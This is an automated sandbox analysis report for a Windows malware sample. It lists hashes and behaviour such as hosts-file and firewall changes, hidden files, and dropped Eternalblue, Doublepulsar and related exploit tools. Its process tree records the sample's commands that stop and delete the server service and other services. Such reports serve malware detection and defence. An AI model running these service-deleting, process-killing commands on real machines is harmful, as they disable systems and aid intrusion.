Analysis
-
max time kernel
133s -
max time network
75s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
01-06-2024 05:58
Static task
static1
Behavioral task
behavioral1
Sample
898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
-
Size
4.4MB
-
MD5
898bbf64f5e0297bdd76cbd9ae5e4b81
-
SHA1
b978307d7df2d778201fbb6bdf8076ce51b913c2
-
SHA256
09a7c474a03954083379dbbe1aed0f2120776688c294ebedb71e3362113e9db2
-
SHA512
8a5b8f2d34231dcf056ab7b2216efedaddc6890efd5167cc8ee7611a8036f0c923b41230c5ab7887645ca018c37a8afc6ac4efb32f5abd28f8b928dbf1da6fd3
-
SSDEEP
98304:Hv3onZ+azh+78Wftj4puoeuaKhlrH9L7TRZ+ZHJtj/IcikcskwvOC+:wZTzh+wWftLoeghlpzX+ZHTgZwvk
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 1103 4976 cscript.exe 7700 1272 cscript.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 992 netsh.exe -
Sets file execution options in registry 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe\debugger = "taskkill.exe" reg.exe -
Sets file to hidden 1 TTPs 17 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4900 attrib.exe 4536 attrib.exe 5720 attrib.exe 5372 attrib.exe 5928 attrib.exe 3532 attrib.exe 2932 attrib.exe 5680 attrib.exe 3820 attrib.exe 4988 attrib.exe 5104 attrib.exe 3500 attrib.exe 5360 attrib.exe 5304 attrib.exe 5884 attrib.exe 5384 attrib.exe 4048 attrib.exe -
Deletes itself 1 IoCs
pid Process 2804 WScript.exe -
Executes dropped EXE 8 IoCs
pid Process 812 conhost.exe 2468 Fileftp.exe 5372 conhost.exe 4588 Eternalblue-2.2.0.exe 3604 Eternalromance-1.4.0.exe 2396 Eternalchampion-2.0.0.exe 6072 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe -
Loads dropped DLL 64 IoCs
pid Process 2376 cmd.exe 812 conhost.exe 2468 Fileftp.exe 2468 Fileftp.exe 2468 Fileftp.exe 2468 Fileftp.exe 2468 Fileftp.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 4588 Eternalblue-2.2.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 3604 Eternalromance-1.4.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2396 Eternalchampion-2.0.0.exe 2468 Fileftp.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 4872 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe 6072 Doublepulsar-1.3.1.exe -
Modifies file permissions 1 TTPs 17 IoCs
pid Process 5296 takeown.exe 3880 takeown.exe 3516 takeown.exe 4464 takeown.exe 5424 takeown.exe 5764 takeown.exe 1724 takeown.exe 2916 takeown.exe 4232 takeown.exe 6036 takeown.exe 5968 takeown.exe 2440 takeown.exe 5732 takeown.exe 3916 takeown.exe 5768 takeown.exe 3076 takeown.exe 5520 takeown.exe -
resource yara_rule behavioral1/files/0x0007000000014246-21.dat upx behavioral1/memory/2468-26-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-121-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-134-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-136-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-138-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-140-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-142-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-144-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-146-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-221-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-223-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-227-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-230-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-232-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-234-0x0000000000400000-0x0000000000CB0000-memory.dmp upx behavioral1/memory/2468-289-0x0000000000400000-0x0000000000CB0000-memory.dmp upx -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: Fileftp.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\HalPluginsServices.dll attrib.exe File opened for modification C:\Windows\SysWOW64\wmassrv.dll attrib.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.exe Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.fb Fileftp.exe File created C:\Program Files\Windowsd\iconv.dll Fileftp.exe File created C:\Program Files\Windowsd\pcre-0.dll Fileftp.exe File created C:\Program Files\Windowsd\Pkill.dll Fileftp.exe File created C:\Program Files\Windowsd\trch-0.dll Fileftp.exe File created C:\Program Files\Windowsd\trfo-0.dll Fileftp.exe File created C:\Program Files\Windowsd\dmgd-1.dll Fileftp.exe File created C:\Program Files\Windowsd\zlib1.dll Fileftp.exe File created C:\Program Files\Windowsd\xdvl-0.dll Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.xml Fileftp.exe File created C:\Program Files\Windowsd\tucl-1.dll Fileftp.exe File created C:\Program Files\Windowsd\tem.vbs Fileftp.exe File created C:\Program Files\Windowsd\Eternalblue-2.2.0.fb Fileftp.exe File created C:\Program Files\Windowsd\Eternalchampion-2.0.0.xml Fileftp.exe File created C:\Program Files\Windowsd\Eternalromance-1.3.0.exe Fileftp.exe File created C:\Program Files\Windowsd\riar.dll Fileftp.exe File created C:\Program Files\Windowsd\tibe-2.dll Fileftp.exe File opened for modification C:\Program Files\Windowsd\Fileftp.exe conhost.exe File created C:\Program Files\Windowsd\exma.dll Fileftp.exe File created C:\Program Files\Windowsd\riar-2.dll Fileftp.exe File created C:\Program Files\Windowsd\cnli-1.dll Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudit-2.1.0.exe Fileftp.exe File created C:\Program Files\Windowsd\Esteemaudit-2.1.0.fb Fileftp.exe File created C:\Program Files\Windowsd\etchCore-1.x64.dll Fileftp.exe File created C:\Program Files\Windowsd\etebCore-2.x86.dll Fileftp.exe File created C:\Program Files\Windowsd\pcreposix-0.dll Fileftp.exe File created C:\Program Files\Windowsd\trch.dll Fileftp.exe File opened for modification C:\program files (x86)\exfg attrib.exe File created C:\Program Files\Windowsd\Eternalromance-1.3.0.xml Fileftp.exe File created C:\Program Files\Windowsd\crli-0.dll Fileftp.exe File created C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe Fileftp.exe File created C:\Program Files\Windowsd\zibe.dll Fileftp.exe File created C:\Program Files\Windowsd\shellcode.bin Fileftp.exe File created C:\Program Files\Windowsd\ssleay32.dll Fileftp.exe File created C:\Program Files\Windowsd\ucl.dll Fileftp.exe File created C:\Program Files\Windowsd\Fileftp.exe conhost.exe File created C:\Program Files\Windowsd\1.txt Eternalromance-1.4.0.exe File created C:\Program Files\Windowsd\x64.dll conhost.exe File created C:\Program Files\Windowsd\Eternalblue-2.2.0.exe Fileftp.exe File opened for modification C:\Program Files\Windowsd\log.txt Eternalchampion-2.0.0.exe File created C:\Program Files\Windowsd\Eternalchampion-2.0.0.fb Fileftp.exe File created C:\Program Files\Windowsd\posh-0.dll Fileftp.exe File created C:\Program Files\Windowsd\tibe.dll Fileftp.exe File created C:\Program Files\Windowsd\adfw.dll Fileftp.exe File created C:\Program Files\Windowsd\cnli-0.dll Fileftp.exe File created C:\Program Files\Windowsd\dmgd-4.dll Fileftp.exe File created C:\Program Files\Windowsd\etchCore-0.x86.dll Fileftp.exe File created C:\Program Files\Windowsd\etebCore-2.x64.dll Fileftp.exe File created C:\Program Files\Windowsd\Eternalblue-2.2.0.xml Fileftp.exe File opened for modification C:\Program Files\Windowsd\1.txt Eternalchampion-2.0.0.exe File opened for modification C:\Program Files\Windowsd\tem.vbs Fileftp.exe File created C:\Program Files\Windowsd\Eternalromance-1.4.0.fb Fileftp.exe File created C:\Program Files\Windowsd\Doublepulsar-1.3.1.xml Fileftp.exe File created C:\Program Files\Windowsd\libiconv-2.dll Fileftp.exe File created C:\Program Files\Windowsd\libxml2.dll Fileftp.exe File created C:\Program Files\Windowsd\pcrecpp-0.dll Fileftp.exe File created C:\Program Files\Windowsd\tibe-1.dll Fileftp.exe File opened for modification C:\Program Files\Windowsd\Fileftp.exe conhost.exe File opened for modification C:\Program Files\Windowsd\log.txt Eternalblue-2.2.0.exe File created C:\Program Files\Windowsd\Eternalromance-1.4.0.xml Fileftp.exe File created C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe Fileftp.exe File created C:\Program Files\Windowsd\Eternalromance-1.3.0.fb Fileftp.exe File created C:\Program Files\Windowsd\etchCore-0.x64.dll Fileftp.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File opened for modification C:\Windows\splwow64.exe attrib.exe File opened for modification C:\Windows\Fonts\Mysql attrib.exe File opened for modification C:\Windows\SecureBootThemes attrib.exe File opened for modification C:\Windows\sysprepthemes attrib.exe File opened for modification C:\Windows\svchost.exe attrib.exe File opened for modification C:\Windows\debug\lsmos.exe attrib.exe File opened for modification C:\Windows\boy.exe attrib.exe File opened for modification C:\Windows\SpeechsTracing attrib.exe File created \??\c:\windows\inf\demo1.bat 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File created \??\c:\windows\inf\temp1.bat 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File created C:\windows\Installer\conhost.exe 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File created C:\windows\Installer\free.bat 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe File opened for modification C:\Windows\system\lsaus.exe attrib.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3808 sc.exe 1044 sc.exe 4644 sc.exe 5356 sc.exe 5804 sc.exe 2340 sc.exe 1796 sc.exe 4660 sc.exe 3872 sc.exe 3504 sc.exe 4956 sc.exe 5708 sc.exe 5152 sc.exe 3384 sc.exe 5116 sc.exe 3852 sc.exe 3048 sc.exe 2684 sc.exe 5480 sc.exe 3388 sc.exe 1128 sc.exe 2964 sc.exe 5152 sc.exe 3580 sc.exe 5904 sc.exe 4932 sc.exe 5132 sc.exe 4836 sc.exe 4852 sc.exe 3428 sc.exe 3440 sc.exe 6096 sc.exe 4892 sc.exe 5376 sc.exe 2212 sc.exe 6116 sc.exe 5340 sc.exe 1384 sc.exe 2572 sc.exe 4724 sc.exe 5472 sc.exe 1424 sc.exe 4584 sc.exe 4916 sc.exe 5372 sc.exe 4720 sc.exe 3432 sc.exe 4668 sc.exe 4832 sc.exe 4232 sc.exe 1540 sc.exe 4860 sc.exe 5488 sc.exe 4924 sc.exe 3456 sc.exe 3464 sc.exe 4632 sc.exe 4700 sc.exe 4660 sc.exe 4944 sc.exe 3820 sc.exe 5624 sc.exe 5136 sc.exe 3420 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4732 schtasks.exe 5444 schtasks.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 5316 ipconfig.exe -
Kills process with WMI 22 IoCs
pid Process 1896 WMIC.exe 3992 WMIC.exe 3516 WMIC.exe 3976 WMIC.exe 4828 WMIC.exe 5952 WMIC.exe 5068 WMIC.exe 5184 WMIC.exe 5508 WMIC.exe 3580 WMIC.exe 5252 WMIC.exe 3548 WMIC.exe 3484 WMIC.exe 5556 WMIC.exe 4948 WMIC.exe 4624 WMIC.exe 5856 WMIC.exe 5176 WMIC.exe 4032 WMIC.exe 2088 WMIC.exe 5404 WMIC.exe 5044 WMIC.exe -
Kills process with taskkill 15 IoCs
pid Process 5268 taskkill.exe 5856 taskkill.exe 3548 taskkill.exe 5920 taskkill.exe 4516 taskkill.exe 4508 taskkill.exe 4028 taskkill.exe 3360 taskkill.exe 3444 taskkill.exe 1704 taskkill.exe 2348 taskkill.exe 6080 taskkill.exe 4584 taskkill.exe 5244 taskkill.exe 5192 taskkill.exe -
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TypedURLs Fileftp.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1724 PING.EXE 2300 PING.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2468 Fileftp.exe 2468 Fileftp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 2440 takeown.exe Token: SeDebugPrivilege 2348 taskkill.exe Token: SeTakeOwnershipPrivilege 2916 takeown.exe Token: SeTakeOwnershipPrivilege 4232 takeown.exe Token: SeTakeOwnershipPrivilege 5296 takeown.exe Token: SeDebugPrivilege 5268 taskkill.exe Token: SeIncreaseQuotaPrivilege 5856 WMIC.exe Token: SeSecurityPrivilege 5856 WMIC.exe Token: SeTakeOwnershipPrivilege 5856 WMIC.exe Token: SeLoadDriverPrivilege 5856 WMIC.exe Token: SeSystemProfilePrivilege 5856 WMIC.exe Token: SeSystemtimePrivilege 5856 WMIC.exe Token: SeProfSingleProcessPrivilege 5856 WMIC.exe Token: SeIncBasePriorityPrivilege 5856 WMIC.exe Token: SeCreatePagefilePrivilege 5856 WMIC.exe Token: SeBackupPrivilege 5856 WMIC.exe Token: SeRestorePrivilege 5856 WMIC.exe Token: SeShutdownPrivilege 5856 WMIC.exe Token: SeDebugPrivilege 5856 WMIC.exe Token: SeSystemEnvironmentPrivilege 5856 WMIC.exe Token: SeRemoteShutdownPrivilege 5856 WMIC.exe Token: SeUndockPrivilege 5856 WMIC.exe Token: SeManageVolumePrivilege 5856 WMIC.exe Token: 33 5856 WMIC.exe Token: 34 5856 WMIC.exe Token: 35 5856 WMIC.exe Token: SeIncreaseQuotaPrivilege 5856 WMIC.exe Token: SeSecurityPrivilege 5856 WMIC.exe Token: SeTakeOwnershipPrivilege 5856 WMIC.exe Token: SeLoadDriverPrivilege 5856 WMIC.exe Token: SeSystemProfilePrivilege 5856 WMIC.exe Token: SeSystemtimePrivilege 5856 WMIC.exe Token: SeProfSingleProcessPrivilege 5856 WMIC.exe Token: SeIncBasePriorityPrivilege 5856 WMIC.exe Token: SeCreatePagefilePrivilege 5856 WMIC.exe Token: SeBackupPrivilege 5856 WMIC.exe Token: SeRestorePrivilege 5856 WMIC.exe Token: SeShutdownPrivilege 5856 WMIC.exe Token: SeDebugPrivilege 5856 WMIC.exe Token: SeSystemEnvironmentPrivilege 5856 WMIC.exe Token: SeRemoteShutdownPrivilege 5856 WMIC.exe Token: SeUndockPrivilege 5856 WMIC.exe Token: SeManageVolumePrivilege 5856 WMIC.exe Token: 33 5856 WMIC.exe Token: 34 5856 WMIC.exe Token: 35 5856 WMIC.exe Token: SeTakeOwnershipPrivilege 5732 takeown.exe Token: SeBackupPrivilege 2468 Fileftp.exe Token: SeSecurityPrivilege 2468 Fileftp.exe Token: SeSecurityPrivilege 2468 Fileftp.exe Token: SeBackupPrivilege 2468 Fileftp.exe Token: SeSecurityPrivilege 2468 Fileftp.exe Token: SeBackupPrivilege 2468 Fileftp.exe Token: SeSecurityPrivilege 2468 Fileftp.exe Token: SeTakeOwnershipPrivilege 5764 takeown.exe Token: SeDebugPrivilege 6080 taskkill.exe Token: SeDebugPrivilege 5856 taskkill.exe Token: SeIncreaseQuotaPrivilege 2088 WMIC.exe Token: SeSecurityPrivilege 2088 WMIC.exe Token: SeTakeOwnershipPrivilege 2088 WMIC.exe Token: SeLoadDriverPrivilege 2088 WMIC.exe Token: SeSystemProfilePrivilege 2088 WMIC.exe Token: SeSystemtimePrivilege 2088 WMIC.exe Token: SeProfSingleProcessPrivilege 2088 WMIC.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 2468 Fileftp.exe 2468 Fileftp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2100 wrote to memory of 2588 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 28 PID 2100 wrote to memory of 2588 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 28 PID 2100 wrote to memory of 2588 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 28 PID 2100 wrote to memory of 2588 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 28 PID 2100 wrote to memory of 2964 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 29 PID 2100 wrote to memory of 2964 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 29 PID 2100 wrote to memory of 2964 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 29 PID 2100 wrote to memory of 2964 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 29 PID 2100 wrote to memory of 3048 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 31 PID 2100 wrote to memory of 3048 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 31 PID 2100 wrote to memory of 3048 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 31 PID 2100 wrote to memory of 3048 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 31 PID 2100 wrote to memory of 2512 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 33 PID 2100 wrote to memory of 2512 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 33 PID 2100 wrote to memory of 2512 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 33 PID 2100 wrote to memory of 2512 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 33 PID 2100 wrote to memory of 2192 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 34 PID 2100 wrote to memory of 2192 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 34 PID 2100 wrote to memory of 2192 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 34 PID 2100 wrote to memory of 2192 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 34 PID 2100 wrote to memory of 2556 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 35 PID 2100 wrote to memory of 2556 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 35 PID 2100 wrote to memory of 2556 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 35 PID 2100 wrote to memory of 2556 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 35 PID 2100 wrote to memory of 2572 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 36 PID 2100 wrote to memory of 2572 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 36 PID 2100 wrote to memory of 2572 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 36 PID 2100 wrote to memory of 2572 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 36 PID 2100 wrote to memory of 2608 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 39 PID 2100 wrote to memory of 2608 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 39 PID 2100 wrote to memory of 2608 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 39 PID 2100 wrote to memory of 2608 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 39 PID 2100 wrote to memory of 2516 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 41 PID 2100 wrote to memory of 2516 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 41 PID 2100 wrote to memory of 2516 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 41 PID 2100 wrote to memory of 2516 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 41 PID 2100 wrote to memory of 2380 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 43 PID 2100 wrote to memory of 2380 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 43 PID 2100 wrote to memory of 2380 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 43 PID 2100 wrote to memory of 2380 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 43 PID 2100 wrote to memory of 2676 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 44 PID 2100 wrote to memory of 2676 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 44 PID 2100 wrote to memory of 2676 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 44 PID 2100 wrote to memory of 2676 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 44 PID 2100 wrote to memory of 2692 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 46 PID 2100 wrote to memory of 2692 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 46 PID 2100 wrote to memory of 2692 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 46 PID 2100 wrote to memory of 2692 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 46 PID 2588 wrote to memory of 2900 2588 net.exe 48 PID 2588 wrote to memory of 2900 2588 net.exe 48 PID 2588 wrote to memory of 2900 2588 net.exe 48 PID 2588 wrote to memory of 2900 2588 net.exe 48 PID 2100 wrote to memory of 2788 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 49 PID 2100 wrote to memory of 2788 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 49 PID 2100 wrote to memory of 2788 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 49 PID 2100 wrote to memory of 2788 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 49 PID 2100 wrote to memory of 2952 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 51 PID 2100 wrote to memory of 2952 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 51 PID 2100 wrote to memory of 2952 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 51 PID 2100 wrote to memory of 2952 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 51 PID 2100 wrote to memory of 2684 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 52 PID 2100 wrote to memory of 2684 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 52 PID 2100 wrote to memory of 2684 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 52 PID 2100 wrote to memory of 2684 2100 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe 52 -
Views/modifies file attributes 1 TTPs 24 IoCs
pid Process 1928 attrib.exe 5680 attrib.exe 3820 attrib.exe 1492 attrib.exe 3500 attrib.exe 3532 attrib.exe 4536 attrib.exe 5360 attrib.exe 1892 attrib.exe 4900 attrib.exe 1404 attrib.exe 4048 attrib.exe 5104 attrib.exe 2932 attrib.exe 5388 attrib.exe 4988 attrib.exe 5720 attrib.exe 5384 attrib.exe 5372 attrib.exe 1920 attrib.exe 1700 attrib.exe 5928 attrib.exe 5304 attrib.exe 5884 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵PID:2900
-
-
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵PID:2512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵PID:2656
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵PID:2192
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵PID:2556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵PID:2300
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
PID:2572
-
-
C:\Windows\SysWOW64\net.exenet stop COMSysCts2⤵PID:2608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop COMSysCts3⤵PID:2732
-
-
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts2⤵PID:2516
-
-
C:\Windows\SysWOW64\net.exenet stop WmiAppSrv2⤵PID:2380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WmiAppSrv3⤵PID:1580
-
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv2⤵PID:2676
-
-
C:\Windows\SysWOW64\net.exenet stop Bcdefg2⤵PID:2692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Bcdefg3⤵PID:2728
-
-
-
C:\Windows\SysWOW64\sc.exesc delete Bcdefg2⤵PID:2788
-
-
C:\Windows\SysWOW64\net.exenet stop WSSDPSRVS2⤵PID:2952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WSSDPSRVS3⤵PID:108
-
-
-
C:\Windows\SysWOW64\sc.exesc delete SSDPSRVS2⤵
- Launches sc.exe
PID:2684
-
